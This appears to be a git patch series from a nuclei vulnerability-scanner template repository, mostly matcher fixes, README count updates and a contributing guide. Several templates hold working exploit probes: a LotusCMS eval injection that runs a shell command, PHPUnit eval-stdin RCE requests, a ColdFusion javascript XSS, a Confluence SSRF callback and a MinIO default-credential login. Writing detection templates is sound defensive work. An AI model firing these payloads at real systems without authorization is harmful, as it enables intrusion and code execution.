a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -39,6 +39,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "dns" + - "http" diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 89ce454661..0264cbe40c 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -26,4 +26,4 @@ requests: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "dns" + - "http" diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index aae3ad4e52..5c7d640e04 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -23,6 +23,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "dns" \ No newline at end of file + - "http" \ No newline at end of file diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index fe42638f6e..067c443aa7 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -18,6 +18,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "dns" + - "http" diff --git a/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml b/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml index 3835f1ea7a..ba60b17eb0 100644 --- a/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml +++ b/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml @@ -16,6 +16,6 @@ requests: - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "dns" + - "http" From 35a8d999cb05f450596a719d9729eaa5ca4aca84 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 4 Jul 2021 01:05:05 +0530 Subject: [PATCH 0250/4083] strict matchers --- cves/2012/CVE-2012-3153.yaml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml index cd8db5f3dc..d624c59d99 100755 --- a/cves/2012/CVE-2012-3153.yaml +++ b/cves/2012/CVE-2012-3153.yaml @@ -24,9 +24,7 @@ requests: matchers: - type: dsl dsl: - - 'regex("\\\\.*\\\\showenv", body_1)' - - 'regex("/.*/showenv", body_1)' - condition: or + - 'contains(body_1, "Reports Servlet")' - type: status status: @@ -41,11 +39,9 @@ requests: extractors: - type: regex name: windows_working_path - part: body_1 regex: - ".?.?\\\\.*\\\\showenv" - type: regex name: linux_working_path - part: body_1 regex: - "/.*/showenv" From afcbe4cfe46f413b2846d99085f20df1e85448e4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 4 Jul 2021 01:22:08 +0530 Subject: [PATCH 0251/4083] minor updates --- exposures/logs/jboss-seam-debug-page.yaml | 1 + misconfiguration/aem/aem-crx-bypass.yaml | 1 + misconfiguration/jetty-showcontexts-enable.yaml | 1 - vulnerabilities/other/coldfusion-debug-xss.yaml | 2 ++ vulnerabilities/other/jfrog-unauth-build-exposed.yaml | 1 + 5 files changed, 5 insertions(+), 1 deletion(-) diff --git a/exposures/logs/jboss-seam-debug-page.yaml b/exposures/logs/jboss-seam-debug-page.yaml index e3493c0ad3..d9e7292d8a 100644 --- a/exposures/logs/jboss-seam-debug-page.yaml +++ b/exposures/logs/jboss-seam-debug-page.yaml @@ -18,6 +18,7 @@ requests: words: - "SeamDebugPage" - "org.jboss.seam" + condition: and - type: status status: diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index 0fb736625e..9fb5fd8006 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -24,6 +24,7 @@ requests: Referer: {{BaseURL}} Connection: close Accept-Encoding: gzip, deflate + matchers-condition: and matchers: - type: word diff --git a/misconfiguration/jetty-showcontexts-enable.yaml b/misconfiguration/jetty-showcontexts-enable.yaml index 08c705bc9b..a146bdcb2d 100644 --- a/misconfiguration/jetty-showcontexts-enable.yaml +++ b/misconfiguration/jetty-showcontexts-enable.yaml @@ -17,7 +17,6 @@ requests: - type: word words: - "Contexts known to this server are:" - condition: and - type: status status: diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml index 60e73bbb52..300d94a436 100644 --- a/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -12,12 +12,14 @@ requests: path: - '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' - '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' + matchers-condition: and matchers: - type: word part: body words: - '"cf_main_cf" src="javascript:alert(1)"' + - type: word part: header words: diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index 7c0533e52b..438c009dcc 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -17,6 +17,7 @@ requests: Content-Type: application/json {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} + matchers: - type: word words: From 45b40682b959f9c38f7ee08b329f37e768540df5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 3 Jul 2021 19:53:34 +0000 Subject: [PATCH 0252/4083] Auto Update README [Sat Jul 3 19:53:34 UTC 2021] :robot: --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index dcad5095d5..4caae02dac 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 377 | vulnerabilities | 203 | exposed-panels | 178 | -| takeovers | 69 | exposures | 107 | technologies | 108 | -| misconfiguration | 73 | workflows | 32 | miscellaneous | 26 | +| cves | 377 | vulnerabilities | 205 | exposed-panels | 178 | +| takeovers | 69 | exposures | 108 | technologies | 108 | +| misconfiguration | 74 | workflows | 32 | miscellaneous | 26 | | default-logins | 35 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**124 directories, 1407 files**. +**124 directories, 1411 files**. From d50459eb9bf29195285199a883526b48e4049fd1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 4 Jul 2021 01:26:41 +0530 Subject: [PATCH 0253/4083] Added missing matcher --- vulnerabilities/other/jfrog-unauth-build-exposed.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index 438c009dcc..c106f95dbd 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -18,6 +18,7 @@ requests: {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} + matchers-condition: and matchers: - type: word words: From 3a72926d54e7c177c29a5e3617fd9dc731491eae Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 4 Jul 2021 02:56:43 +0000 Subject: [PATCH 0254/4083] Create laravel-phpunit-rce.yaml --- .../laravel/laravel-phpunit-rce.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/laravel/laravel-phpunit-rce.yaml diff --git a/vulnerabilities/laravel/laravel-phpunit-rce.yaml b/vulnerabilities/laravel/laravel-phpunit-rce.yaml new file mode 100644 index 0000000000..b4b92c8f33 --- /dev/null +++ b/vulnerabilities/laravel/laravel-phpunit-rce.yaml @@ -0,0 +1,29 @@ +id: laravel-phpunit-rce + +info: + name: Laravel Phpunit RCE + author: pikpikcu + severity: critical + reference: https://twitter.com/sec715/status/1411517028012158976 + tags: laravel,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" + headers: + Content-Type: text/html + body: | + + + matchers-condition: and + matchers: + + - type: word + words: + - "PHP Version" + part: body + + - type: status + status: + - 200 From 13a5215bda0328db3c2852ef7a778e8b9e70f9c3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 4 Jul 2021 15:50:15 +0530 Subject: [PATCH 0255/4083] Update CVE-2017-9841.yaml --- cves/2017/CVE-2017-9841.yaml | 100 +++++++++++++++++++++++++++++------ 1 file changed, 84 insertions(+), 16 deletions(-) diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 981176418d..8dfc998fe6 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -2,34 +2,102 @@ id: CVE-2017-9841 info: name: CVE-2017-9841 - author: Random_Robbie + author: Random_Robbie,pikpikcu severity: high description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a " + + - | + GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 + Connection: close + Content-Length: 17 + Accept: */* + Accept-Language: en + Content-Type: text/html + Accept-Encoding: gzip, deflate + + + + - | + GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 + Connection: close + Content-Length: 17 + Accept: */* + Accept-Language: en + Content-Type: text/html + Accept-Encoding: gzip, deflate + + + + - | + GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 + Connection: close + Content-Length: 17 + Accept: */* + Accept-Language: en + Content-Type: text/html + Accept-Encoding: gzip, deflate + + + + - | + GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 + Connection: close + Content-Length: 17 + Accept: */* + Accept-Language: en + Content-Type: text/html + Accept-Encoding: gzip, deflate + + + + - | + GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 + Connection: close + Content-Length: 17 + Accept: */* + Accept-Language: en + Content-Type: text/html + Accept-Encoding: gzip, deflate + + + matchers-condition: and matchers: - type: word words: - - "this version of phpunit requires php 5" + - "6dd70f16549456495373a337e6708865" part: body - type: status From 36a09180921d0acbe0ea7e00c80d010c9cc338d5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 4 Jul 2021 16:02:51 +0530 Subject: [PATCH 0256/4083] fixes --- cves/2017/CVE-2017-9841.yaml | 12 ++++---- .../laravel/laravel-phpunit-rce.yaml | 29 ------------------- 2 files changed, 6 insertions(+), 35 deletions(-) delete mode 100644 vulnerabilities/laravel/laravel-phpunit-rce.yaml diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 8dfc998fe6..2a6ed3a69c 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -25,7 +25,7 @@ requests: Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - + - | @@ -38,7 +38,7 @@ requests: Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - + - | @@ -51,7 +51,7 @@ requests: Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - + - | @@ -64,7 +64,7 @@ requests: Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - + - | @@ -77,7 +77,7 @@ requests: Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - + - | @@ -90,7 +90,7 @@ requests: Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - + matchers-condition: and diff --git a/vulnerabilities/laravel/laravel-phpunit-rce.yaml b/vulnerabilities/laravel/laravel-phpunit-rce.yaml deleted file mode 100644 index b4b92c8f33..0000000000 --- a/vulnerabilities/laravel/laravel-phpunit-rce.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: laravel-phpunit-rce - -info: - name: Laravel Phpunit RCE - author: pikpikcu - severity: critical - reference: https://twitter.com/sec715/status/1411517028012158976 - tags: laravel,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" - headers: - Content-Type: text/html - body: | - - - matchers-condition: and - matchers: - - - type: word - words: - - "PHP Version" - part: body - - - type: status - status: - - 200 From ecdd86167a0bee4755768e3dd3460e49974344b2 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 4 Jul 2021 11:11:19 +0000 Subject: [PATCH 0257/4083] Create lotuscms-rce.yaml --- vulnerabilities/other/lotuscms-rce.yaml | 30 +++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/other/lotuscms-rce.yaml diff --git a/vulnerabilities/other/lotuscms-rce.yaml b/vulnerabilities/other/lotuscms-rce.yaml new file mode 100644 index 0000000000..412ca4fe4a --- /dev/null +++ b/vulnerabilities/other/lotuscms-rce.yaml @@ -0,0 +1,30 @@ +id: lotuscms-rce + +info: + name: LotusCMS 3.0 - RCE + author: pikpikcu + severity: critical + reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit + tags: lotuscms,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/index.php" + # - "{{BaseURL}}/lcms/index.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + page=index');${system(phpinfo())};# + + matchers-condition: and + matchers: + + - type: word + words: + - "PHP Version" + part: body + + - type: status + status: + - 200 From 457ce76e3444969810f290c6c19eac95e7ad387a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 4 Jul 2021 17:09:45 +0530 Subject: [PATCH 0258/4083] minor updates --- vulnerabilities/other/lotuscms-rce.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/other/lotuscms-rce.yaml b/vulnerabilities/other/lotuscms-rce.yaml index 412ca4fe4a..e9cf4de15f 100644 --- a/vulnerabilities/other/lotuscms-rce.yaml +++ b/vulnerabilities/other/lotuscms-rce.yaml @@ -1,7 +1,7 @@ id: lotuscms-rce info: - name: LotusCMS 3.0 - RCE + name: LotusCMS 3.0 eval() RCE author: pikpikcu severity: critical reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit @@ -11,20 +11,20 @@ requests: - method: POST path: - "{{BaseURL}}/index.php" - # - "{{BaseURL}}/lcms/index.php" + - "{{BaseURL}}/lcms/index.php" + headers: Content-Type: application/x-www-form-urlencoded body: | - page=index');${system(phpinfo())};# + page=index');${system('echo lotuscms_rce | md5sum')};# matchers-condition: and matchers: - - type: word words: - - "PHP Version" + - "38ee63071a04dc5e04ed22624c38e648" part: body - type: status status: - - 200 + - 200 \ No newline at end of file From 999d23da9f24a416df78b3dcfcc249928d8d0c8f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 4 Jul 2021 11:42:33 +0000 Subject: [PATCH 0259/4083] Auto Update README [Sun Jul 4 11:42:33 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4caae02dac..1f1a3300ea 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 377 | vulnerabilities | 205 | exposed-panels | 178 | +| cves | 377 | vulnerabilities | 206 | exposed-panels | 178 | | takeovers | 69 | exposures | 108 | technologies | 108 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 26 | | default-logins | 35 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**124 directories, 1411 files**. +**124 directories, 1412 files**. From b5ce9e324c30748628ad8e8588156b3d6ae02af9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Jul 2021 15:39:47 +0530 Subject: [PATCH 0260/4083] Create default-openresty.yaml --- technologies/default-openresty.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 technologies/default-openresty.yaml diff --git a/technologies/default-openresty.yaml b/technologies/default-openresty.yaml new file mode 100644 index 0000000000..401ac8779f --- /dev/null +++ b/technologies/default-openresty.yaml @@ -0,0 +1,18 @@ +id: default-openresty + +info: + name: OpenResty Default Page + author: dhiyaneshDk + severity: info + tags: tech,openrestry + reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 + +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "Welcome to OpenResty!" + part: body From b0709d23d85acd2df75213747be2a84f9f61bfe9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Jul 2021 11:46:50 +0000 Subject: [PATCH 0261/4083] Auto Update README [Mon Jul 5 11:46:50 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1f1a3300ea..bb8ca0f20d 100644 --- a/README.md +++ b/README.md @@ -40,11 +40,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 377 | vulnerabilities | 206 | exposed-panels | 178 | | takeovers | 69 | exposures | 108 | technologies | 108 | -| misconfiguration | 74 | workflows | 32 | miscellaneous | 26 | +| misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 35 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**124 directories, 1412 files**. +**124 directories, 1413 files**. From aec2d361547183ba206c9f65160b2c0b062ecc23 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 5 Jul 2021 18:35:47 +0530 Subject: [PATCH 0262/4083] Update zentao-detect.yaml --- exposed-panels/zentao-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/zentao-detect.yaml b/exposed-panels/zentao-detect.yaml index 9d462c0d59..7b47941c0e 100644 --- a/exposed-panels/zentao-detect.yaml +++ b/exposed-panels/zentao-detect.yaml @@ -14,7 +14,9 @@ requests: - type: word words: - '"sessionName":"zentaosid"' + - '{"version":"' part: body + condition: and extractors: - type: regex From 008d2eda4f87fedd974253e4bcbfd061a11b3fdb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Jul 2021 13:16:40 +0000 Subject: [PATCH 0263/4083] Auto Update README [Mon Jul 5 13:16:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bb8ca0f20d..ea233c26a9 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 377 | vulnerabilities | 206 | exposed-panels | 178 | +| cves | 377 | vulnerabilities | 206 | exposed-panels | 179 | | takeovers | 69 | exposures | 108 | technologies | 108 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 35 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**124 directories, 1413 files**. +**124 directories, 1414 files**. From 9584b5352e973eddad4931409cc233716541388f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 5 Jul 2021 18:48:16 +0530 Subject: [PATCH 0264/4083] Update minio-detect.yaml --- exposed-panels/minio-detect.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/exposed-panels/minio-detect.yaml b/exposed-panels/minio-detect.yaml index 3e40bb74cf..f73a56cfd7 100644 --- a/exposed-panels/minio-detect.yaml +++ b/exposed-panels/minio-detect.yaml @@ -10,8 +10,12 @@ requests: - method: GET path: - "{{BaseURL}}/minio/login" + matchers-condition: and matchers: - type: word words: - "MinIO Browser" part: body + - type: status + status: + - 200 From 22d3cecdc1a5bccd5d9ad7ce46dea94e96f76ab7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 5 Jul 2021 18:50:50 +0530 Subject: [PATCH 0265/4083] Update minio-detect.yaml --- exposed-panels/minio-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/minio-detect.yaml b/exposed-panels/minio-detect.yaml index f73a56cfd7..c7c29a31f4 100644 --- a/exposed-panels/minio-detect.yaml +++ b/exposed-panels/minio-detect.yaml @@ -15,7 +15,9 @@ requests: - type: word words: - "MinIO Browser" + - "Minio Browser" part: body + condition: or - type: status status: - 200 From eac13037746264e5a922fbd472e703e1f99bdae1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Jul 2021 13:23:00 +0000 Subject: [PATCH 0266/4083] Auto Update README [Mon Jul 5 13:23:00 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ea233c26a9..515d6e08b4 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 377 | vulnerabilities | 206 | exposed-panels | 179 | +| cves | 377 | vulnerabilities | 206 | exposed-panels | 180 | | takeovers | 69 | exposures | 108 | technologies | 108 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 35 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**124 directories, 1414 files**. +**124 directories, 1415 files**. From adb089e2ca152cf4090adb8091e1bf090a7b0349 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 5 Jul 2021 19:26:59 +0530 Subject: [PATCH 0267/4083] Added CONTRIBUTING.md --- CONTRIBUTING.md | 98 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 CONTRIBUTING.md diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000000..b472069b6e --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,98 @@ +# Template Contributing Guidelines + +This documentation contains a set of guidelines to help you during the contribution process. +We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project. +Thank you for helping out and remember,**no contribution is too small.** + +# Submitting Nuclei Templates 👩‍💻👨‍💻 + +Below you will find the process and workflow used to review and merge your changes. + +## Step 1 : Find existing templates + +- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one. +- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work +- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template. + +## Step 2 : Fork the Project + +- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote. + +template-fork + +```yaml +git clone https://github.com//nuclei-templates +cd nuclei-templates +git remote add upstream https://github.com/projectdiscovery/nuclei-templates +``` + +- If you have already forked the project, update your copy before working. + +```yaml +git remote update +git checkout master +git rebase upstream/master +``` + +## Step 3 : Create your Template Branch + +Create a new branch. Use its name to identify the issue your addressing. + +```yaml + +# It will create a new branch with name template_branch_name and switch to that branch +git checkout -b template_branch_name +``` + +## Step 4 : Create Template and Commit +- Create your template. +- Add all the files/folders needed. +- After you've made changes or completed template creation, add changes to the branch you've just created by: + +```yaml +# To add all new files to branch template_branch_name +git add . +``` + +- To commit give a descriptive message for the convenience of reveiwer by: + +```yaml +# This message get associated with all files you have changed +git commit -m "Added/Fixed/Updated XXX Template" +``` + +**NOTE**: + +- A Pull Request should have only one unique template to make it simple for review. +- Multiple templates for same technology can be grouped into single Pull Request. + + +## Step 5 : Push Your Changes + +- Now you are ready to your work to the remote repository. +- When your work is ready and complies with the project conventions, upload your changes to your fork: + +```yaml +# To push your work to your remote repository +git push -u origin template_branch_name +``` + +## Step 6 : Pull Request + +- Go to your repository in browser and click on compare and pull requests. Then add a title and description to your pull request that explains your template. +- Voila! Your Pull Request has been submitted and will be reviewed by the moderators and merged.🥳 + +## Need more help?🤔 + +You can refer to the following articles on basics of Git and Github and also contact the Project Mentors, in case you are stuck: + +- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo) +- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request) +- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github) +- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6) +- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github) + + +## Tip from us😇 + +**Nuclei** outcomes are only as excellent as **template matchers💡** \ No newline at end of file From 4f8c13a9833443100c63a5365b6306f1bc4da181 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 5 Jul 2021 19:44:47 +0530 Subject: [PATCH 0268/4083] Update minio-default-password.yaml --- default-logins/minio/minio-default-password.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml index 181a313002..7d2b90fde6 100644 --- a/default-logins/minio/minio-default-password.yaml +++ b/default-logins/minio/minio-default-password.yaml @@ -14,6 +14,13 @@ requests: body: | {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} + - method: POST + path: + - "{{BaseURL}}/minio/webrpc" + headers: + Content-Type: application/json + body: | + {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"} matchers-condition: and matchers: From d080b73f5ea35d733332c5fc84c8f7fd2d69b699 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Jul 2021 14:18:21 +0000 Subject: [PATCH 0269/4083] Auto Update README [Mon Jul 5 14:18:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 515d6e08b4..46b3008d8d 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 377 | vulnerabilities | 206 | exposed-panels | 180 | | takeovers | 69 | exposures | 108 | technologies | 108 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | -| default-logins | 35 | file | 42 | dns | 10 | +| default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**124 directories, 1415 files**. +**125 directories, 1416 files**. From 93898d94e6b65679b4308cad929eb4a67753b377 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 5 Jul 2021 21:05:48 +0530 Subject: [PATCH 0270/4083] Update wp-vault-lfi.yaml --- wp-vault-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/wp-vault-lfi.yaml b/wp-vault-lfi.yaml index 94fd340260..7568fd7338 100644 --- a/wp-vault-lfi.yaml +++ b/wp-vault-lfi.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/40850 - tags: wp,wordpress,lfi + tags: wp-plugin,wordpress,lfi requests: - method: GET From ce43643e00e64c53e6fcc2a34a5d4f0446d7529b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 5 Jul 2021 21:06:50 +0530 Subject: [PATCH 0271/4083] Update and rename wp-vault-lfi.yaml to vulnerabilities/wordpress/wp-vault-lfi.yaml --- .../wordpress/wp-vault-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename wp-vault-lfi.yaml => vulnerabilities/wordpress/wp-vault-lfi.yaml (86%) diff --git a/wp-vault-lfi.yaml b/vulnerabilities/wordpress/wp-vault-lfi.yaml similarity index 86% rename from wp-vault-lfi.yaml rename to vulnerabilities/wordpress/wp-vault-lfi.yaml index 7568fd7338..5bb4ba6ef0 100644 --- a/wp-vault-lfi.yaml +++ b/vulnerabilities/wordpress/wp-vault-lfi.yaml @@ -1,7 +1,7 @@ id: wp-vault-local-file-inclusion info: - name: WP 